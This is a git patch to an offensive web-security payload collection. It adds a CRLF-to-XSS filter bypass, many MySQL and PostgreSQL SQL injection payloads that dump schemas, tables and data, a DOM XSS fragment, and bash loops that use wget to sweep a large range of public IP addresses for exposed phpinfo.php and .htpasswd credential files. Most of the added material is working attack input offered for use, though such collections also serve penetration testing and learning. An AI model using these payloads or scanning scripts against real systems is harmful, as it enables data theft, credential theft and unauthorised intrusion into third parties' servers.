From c73124a79d371dc0ecca363cc33bdeb620a7cf09 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Wed, 2 Nov 2016 20:26:00 +0700 Subject: [PATCH] Enumeration added and improvement for CRLF/XSS/SQL --- CRLF injection/README.md | 17 ++++++++- Enumeration_and_fingerprinting.md | 27 ++++++++++++++ README.md | 27 +++++++------- SQL injection/README.md | 60 +++++++++++++++++++++++++++++-- XSS injection/README.md | 5 +++ 5 files changed, 119 insertions(+), 17 deletions(-) create mode 100644 Enumeration_and_fingerprinting.md diff --git a/CRLF injection/README.md b/CRLF injection/README.md index 2abeee9..a6a0827 100644 --- a/CRLF injection/README.md +++ b/CRLF injection/README.md @@ -26,7 +26,7 @@ x-xss-protection: 1; mode=block ## CRLF - Write HTML Requested page ``` -http://www.example.net/index.php?lang=en%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E +http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E ``` HTTP response @@ -41,5 +41,20 @@ Content-Length: 34 You have been Phished``` + +## CRLF - Filter Bypass +Using UTF-8 encoding +``` +%E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE +``` +Remainder: +* %E5%98%8A = %0A = \u560a +* %E5%98%8D = %0D = \u560d +* %E5%98%BE = %3E = \u563e (>) +* %E5%98%BC = %3C = \u563c (<) + + + + ## Thanks to * https://www.owasp.org/index.php/CRLF_Injection \ No newline at end of file diff --git a/Enumeration_and_fingerprinting.md b/Enumeration_and_fingerprinting.md new file mode 100644 index 0000000..ef853bf --- /dev/null +++ b/Enumeration_and_fingerprinting.md @@ -0,0 +1,27 @@ +# Collection of usefull scripts and tricks + +## Dorks + +Google Dork to find subdomains +``` +site:*.domain.com -www +``` + +## Scripts +Script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) +``` +#!/bin/bash +for ipa in 98.13{6..9}.{0..255}.{0..255}; do +wget -t 1 -T 3 http://${ipa}/phpinfo.php; done & +``` + +Script to detect all .htpasswd files in a range of IPs +``` +#!/bin/bash +for ipa in 98.13{6..9}.{0..255}.{0..255}; do +wget -t 1 -T 3 http://${ipa}/.htpasswd; done & +``` + + +## Thanks to +* http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/ \ No newline at end of file diff --git a/README.md b/README.md index 025b003..bd1ac96 100644 --- a/README.md +++ b/README.md @@ -1,16 +1,17 @@ # Payloads All The Things A list of usefull payloads and bypasses for Web Application Security -Feel free to improve with your payloads (I <3 pull requests) :) +Feel free to improve with your payloads and techniques ! +I <3 pull requests :) -To improve: -* RCE -* SQL injection -* XXE -* SSRF -* Upload -* Tar command exec -* Traversal Directory -* XSS -* PHP Include -* CSV Injection -* PHP Serialization +Last modifications : +* XSS paylods improved +* CRLF payloads improved +* SQLi payloads improved +* Enumeration added (WIP) + +TODO : Basic methodology for hunting bugs and vulnerabilities + +# More resources +Book's list: +* Web Hacking 101 - https://leanpub.com/web-hacking-101 +* The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470 diff --git a/SQL injection/README.md b/SQL injection/README.md index 01e42a5..4a1db6b 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -1,7 +1,7 @@ # SQL injection A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application -## Exploit +## Authentication bypass and Entry point detection Detection of an SQL injection entry point ``` @@ -30,14 +30,50 @@ SELECT id FROM users WHERE username='' or true-- AND password='input2' ``` -MySQL Error Based +# MYSQL +MySQL Union Based +``` +gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata +gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... +gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=... +gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... +``` + + +MySQL Error Based - Basic ``` (select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` +MYSQL Error Based - UpdateXML function +``` +AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)),null)-- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)),null)-- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)),null)-- +AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- +``` -MySQL Blind SQL +MYSQL Error Based - Extractvalue function +``` +AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- +AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- +``` + +MySQL Blind with MAKE_SET +``` +MAKE_SET(YOLO<(SELECT(length(version()))),1) +MAKE_SET(YOLO=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)# +(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)# + +``` + +# POSTGRESQL + +PostgreSQL Error Based - Basic +``` +,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) +,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)-- +,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) +``` + +# Other usefull payloads Polyglot injection (multicontext) ``` diff --git a/XSS injection/README.md b/XSS injection/README.md index 1e72b4c..03c5392 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -83,6 +83,11 @@ XSS in Hidden input Use CTRL+SHIFT+X to trigger the onclick event ``` +DOM XSS +``` +#"> +``` + ## XSS in wrappers javascript and data XSS with javascript: ```